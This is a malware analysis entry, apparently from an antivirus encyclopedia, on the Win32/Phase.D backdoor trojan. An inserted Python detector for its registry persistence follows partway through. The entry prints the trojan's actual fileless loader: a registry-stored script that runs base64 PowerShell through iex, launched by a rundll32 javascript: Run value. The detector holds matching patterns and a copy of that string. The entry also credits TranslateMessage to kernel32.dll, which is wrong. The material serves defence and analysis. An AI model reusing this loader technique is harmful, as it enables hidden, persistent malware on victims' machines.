Win32/Phase [Threat Name]

Win32/Phase.D [Threat Variant Name]

Category trojan
Size 262722 B
Detection created Dec 31, 2014
Detection database version 10949
Aliases VirTool:Win32/CeeInject.gen!KK (Microsoft)
  Variant.Symmi.49542 (BitDefender)
Short description

The trojan serves as a backdoor. It can be controlled remotely.

Installation

The trojan may create the following files:

  • %startup%\%variable%.exe

A string with variable content is used instead of %variable% .


This causes the trojan to be executed on every system start.


The trojan may set the following Registry entries:

  • [HKEY_CURRENT_USER\Software\Microsoft\Active Setup\Installed Components\{72507C54-3577-4830-815B-310007F6135A}]
    • "Rc4Encoded32" = %encryptedpayload_x86% (54989 B)
    • "Rc4Encoded64" = %encryptedpayload_x64% (54989 B)
    • "Javascript" = "sPowerShellScript = "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"; oWSShell = new ActiveXObject("WScript.Shell"); sWindows = oWSShell.ExpandEnvironmentStrings("%windir%"); sPowerShell = sWindows + "\\system32\\windowspowershell\\v1.0\\powershell.exe"; oFile = new ActiveXObject("Scripting.FileSystemObject"); if (oFile.FileExists(sPowerShell)){ (oWSShell.Environment("Process"))("LoadShellCodeScript") = "iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('" + sPowerShellScript + "')))"; oWSShell.Run(sPowerShell + " iex $env:LoadShellCodeScript", 0, 1);}"
  • [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
    • "Windows Host Process (RunDll)" = "rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval((new%20ActiveXObject("WScript.Shell")).RegRead("HKCU\\Software\\Microsoft\\Active%20Setup\\Installed%20Components\\{72507C54-3577-4830-815B-310007F6135A}\\JavaScript"));close();"

This causes the trojan to be executed on every system start.
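As an added defender-side example (not part of this ESET entry), the following Python flags the two persistence artifacts described above: a Run value that launches rundll32 with a javascript: URL and pulls its script body from the registry via RegRead, and the Active Setup CLSID key holding the Rc4Encoded32/Rc4Encoded64/Javascript values. The registry values are constructed sample data embedded inline as SAMPLE_RUN and SAMPLE_ACTIVE_SETUP; on a live host they would come from a registry export or winreg.

```python
import re

# Values this report lists under the Active Setup CLSID key (HKCU).
ACTIVE_SETUP_GUID = "{72507C54-3577-4830-815B-310007F6135A}"
ACTIVE_SETUP_PAYLOAD_VALUES = {"Rc4Encoded32", "Rc4Encoded64", "Javascript"}

# Run-key data that launches rundll32 with a javascript: URL, the loader
# technique documented in this entry (mshtml RunHTMLApplication + RegRead).
RUNDLL_JS = re.compile(r"rundll32(\.exe)?\s+javascript:.*RunHTMLApplication", re.I)
REGREAD = re.compile(r"RegRead\s*\(", re.I)


def inspect_run_value(data):
    """Return the reasons a single Run-key value string looks like this loader."""
    reasons = []
    if RUNDLL_JS.search(data):
        reasons.append("rundll32 javascript:/RunHTMLApplication loader")
    if REGREAD.search(data):
        reasons.append("script body fetched from the registry via RegRead")
    if ACTIVE_SETUP_GUID.lower() in data.lower():
        reasons.append("references the Active Setup CLSID from this report")
    return reasons


def inspect_active_setup(values):
    """values: {value name: data} read from the Active Setup CLSID key.
    Returns the payload value names that are present (sorted)."""
    return sorted(ACTIVE_SETUP_PAYLOAD_VALUES & set(values))


def scan(run_values, active_setup_values):
    """run_values: {value name: data} from HKCU\\...\\CurrentVersion\\Run."""
    run_hits = {name: inspect_run_value(data) for name, data in run_values.items()}
    run_hits = {name: reasons for name, reasons in run_hits.items() if reasons}
    return {"run": run_hits, "active_setup": inspect_active_setup(active_setup_values)}


# Constructed sample data (not a real export): the loader string mirrors the
# Run value quoted in this report; the other Run entry is benign.
SAMPLE_RUN = {
    "Updater": r'"C:\Program Files\App\updater.exe" /background',
    "Windows Host Process (RunDll)": (
        r'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";'
        r'eval((new%20ActiveXObject("WScript.Shell")).RegRead("HKCU\\Software\\Microsoft'
        r'\\Active%20Setup\\Installed%20Components\\{72507C54-3577-4830-815B-310007F6135A}'
        r'\\JavaScript"));close();'),
}
SAMPLE_ACTIVE_SETUP = {"Rc4Encoded32": "<blob>", "Rc4Encoded64": "<blob>",
                       "Javascript": "sPowerShellScript = ...", "StubPath": ""}

if __name__ == "__main__":
    print(scan(SAMPLE_RUN, SAMPLE_ACTIVE_SETUP))
```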


The trojan creates and runs a new thread with its own program code within the following processes:

  • explorer.exe

The trojan creates and runs a new thread with its own program code in all running processes.


The trojan deletes the original file.

Information stealing

The trojan collects the following information:

  • operating system version
  • information about the operating system and system settings
  • FTP account information
  • URLs visited

The trojan is able to log keystrokes.


The trojan collects sensitive information when the user browses certain web sites.


The trojan attempts to send gathered information to a remote machine.

Other information

The trojan acquires data and commands from a remote computer or the Internet.


The trojan contains a URL address. The HTTP protocol is used.


It can execute the following operations:

  • download files from a remote computer and/or the Internet
  • run executable files
  • monitor network traffic
  • set up a proxy server
  • update itself to a newer version
  • uninstall itself
  • capture screenshots
  • simulate user's input (clicks, taps)
  • create Registry entries
  • perform DoS/DDoS attacks
  • open a specific URL address

The trojan contains the program code of the following malware:

  • Win32/ServStart.AD

The trojan hides its presence in the system.


The trojan hooks the following Windows APIs:

  • HttpSendRequestW (wininet.dll)
  • PR_Write (nss3.dll)
  • send (ws2_32.dll)
  • TranslateMessage (kernel32.dll)
  • ZwCreateFile (ntdll.dll)
  • ZwQueryDirectoryFile (ntdll.dll)
  • ZwReadVirtualMemory (ntdll.dll)
  • ZwResumeThread (ntdll.dll)

The trojan keeps various information in the following Registry key:

  • [HKEY_CURRENT_USER\Software\Microsoft\Active Setup\Installed Components\{72507C54-3577-4830-815B-310007F6135A}\Communicate]

The trojan contains both 32-bit and 64-bit program components.
